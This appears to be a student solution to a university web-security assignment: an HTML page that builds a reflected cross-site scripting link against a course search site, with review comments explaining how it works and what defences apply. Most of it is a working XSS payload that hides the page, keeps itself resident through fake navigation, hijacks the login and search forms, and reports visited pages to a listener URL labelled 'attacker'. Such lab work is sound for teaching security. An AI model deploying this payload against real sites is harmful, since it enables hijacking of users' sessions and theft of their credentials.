- <meta charset="utf-8">
- <script src="http://ajax.googleapis.com/ajax/libs/jquery/2.0.3/jquery.min.js"></script>
- <script>
- // payload(attacker): the script body that makeLink() serialises with payload.toString()
- // and places in the `q` parameter of the target's search URL. Once it executes in the
- // target page it hides the document, defines `attacker`, proxy() and log() as globals
- // through an injected script element, and starts proxy("/").
- //   attacker - URL that log() sends navigation events to.
- // Review notes (defender view):
- //   * Everything below runs with the target page's origin, so cookie flags such as
- //     HttpOnly do not stop it from reading values typed into the page's forms.
- //   * The function source is shipped via toString(), so comments placed inside the
- //     body travel with it; renaming proxy/log would break the string-built handlers.
- function payload(attacker) {
- // Reports one event: prints the serialised fields to the console and issues a GET to
- // `attacker` with the fields as query parameters. This is the only request in the
- // listing that leaves the target origin, so it is the observable signal for egress
- // monitoring or a connect-src policy.
- function log(data) {
- console.log($.param(data));
- $.get(attacker, data);
- }
- // Loads `href` into the current document without a real navigation, then re-hooks the
- // freshly loaded markup so the script stays resident across "page changes".
- function proxy(href) {
- //TODO: modify displayed url
- //TODO: push a modified page (that loads the script)
- var stateObj = {
- foo: href
- };
- // pushState changes the address bar to `href` without reloading the document.
- history.pushState(stateObj, "page 2", href);
- $("html").load(href, function() {
- $("html").show();
- // replace all links with proxy
- $('a').each(function() {
- console.log("replaced sth :D");
- var value = $(this).attr('href');
- // The handler is assembled as a string from the link's href, which is why proxy
- // must exist as a global on the page (see the injected script element below).
- $(this).attr('onClick', /*proxy.toString() + ';*/'proxy(\"' + value + '\")');
- $(this).attr('href', '#');
- });
- //hijack login form
- if ($('#log-in-btn').length) {
- $('#log-in-btn').on("click", function(e) {
- e.preventDefault();
- var un = $('#username').val();
- var pw = $('#userpass').val();
- //TODO: log to attacker
- // As written, the two field values are only printed to the console; the request
- // below submits them to the site's own ./login endpoint.
- console.log("btn clicked: " + un + ", " + pw);
- $.ajax({
- url: "./login",
- data: {
- username: un,
- password: pw,
- },
- type: "POST",
- success: function (data) {
- // Replace the document with the login response, then reload "/" through proxy()
- // so the hooks are applied again.
- $("html").html(data);
- proxy("/");
- }
- })
- })
- }
- // hijack search form
- if ($('#search-btn').length) {
- $('#search-btn').on("click", function(e) {
- e.preventDefault();
- var attr = $("#query").val();
- $.ajax({
- url: "./search",
- data: {
- q: attr
- },
- type: "GET",
- success: function (data) {
- $("html").html(data);
- // The query text is concatenated unencoded into the path handed to proxy().
- proxy("search?q=" + attr);
- }
- })
- })
- }
- //TODO: modify logout button
- // One "nav" event per proxied page load, carrying the loaded path.
- log({
- event: "nav",
- uri: href
- });
- });
- }
- // Hide the reflected search page until proxy() has loaded replacement content.
- $("html").hide();
- // load our script on the page
- $(document).ready(function() {
- var script = document.createElement('script');
- // Re-declares `attacker`, proxy and log at global scope from their source text so
- // the string-built onClick handlers can resolve proxy().
- script.text = "var attacker = '" + attacker + "';\n" + proxy.toString() + "\n" + log.toString();
- document.body.appendChild(script);
- console.log("ready");
- });
- proxy("/");
- }
- // makeLink(xssdefense, target, attacker): builds the search URL on `target` whose `q`
- // parameter holds a URI-encoded script element containing payload's source followed by
- // a call to payload(attacker).
- //   xssdefense - defence level, copied into the xssdefense query parameter.
- //   target     - base URL of the site; "/search?..." is appended to it.
- //   attacker   - URL embedded in the payload call.
- // Returns the URL string when xssdefense == 0; for any other level the else branch is
- // empty, so the function returns undefined.
- // NOTE(review): this only works if the search page echoes `q` into its HTML without
- // encoding when xssdefense=0 (not visible here; confirm against the target). The
- // defence belongs on that page: contextual output encoding of `q`, plus a
- // Content-Security-Policy that disallows inline script.
- // The opening and closing script tags are assembled from string fragments,
- // presumably so the literal tag text never appears inside this page's own inline script.
- function makeLink(xssdefense, target, attacker) {
- if (xssdefense == 0) {
- return target + "/search?xssdefense=" + xssdefense.toString() + "&q=" + encodeURIComponent("<script" + ">" + payload.toString() + ";payload(\"" + attacker + "\");<\/script" + ">");
- } else { // Implement code to defeat XSS defenses here.
- }
- }
- // Page configuration. Level 0 is the only defence level makeLink() handles.
- var xssdefense = 0;
- // Site whose search URL is built; it already ends in "/", so the generated URL
- // contains "//search".
- var target = "http://cos432-assn3.cs.princeton.edu/";
- // Collection URL handed to payload(); a loopback address, so events go to a listener
- // on the same machine as the browser.
- var attacker = "http://127.0.0.1:31337/stolen";
- // On DOM ready, replace the content of every h3 (the "parse error" placeholder) with
- // a link to the generated URL that opens in the window named "run".
- $(function() {
- var url = makeLink(xssdefense, target, attacker);
- $("h3").html("<a target=\"run\" href=\"" + url + "\">Try Bungle!</a>");
- });
- </script>
- <h3>parse error</h3>